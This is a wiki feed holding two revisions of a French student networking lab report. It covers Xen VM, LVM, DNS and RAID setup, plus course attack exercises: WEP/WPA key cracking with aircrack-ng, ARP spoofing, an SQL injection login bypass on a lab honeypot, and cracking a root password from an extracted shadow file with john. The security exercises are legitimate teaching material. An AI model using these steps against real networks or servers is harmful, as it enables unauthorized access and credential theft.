  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous allons utiliser l'implementation open-source de DNS bind pour créer une association entre notre nom de domaine et l'ip de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55152</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55152"/>
				<updated>2020-12-21T23:07:07Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* 4.2 Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous allons utiliser l'implementation open-source de DNS bind pour créer une association entre notre nom de domaine et l'ip de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
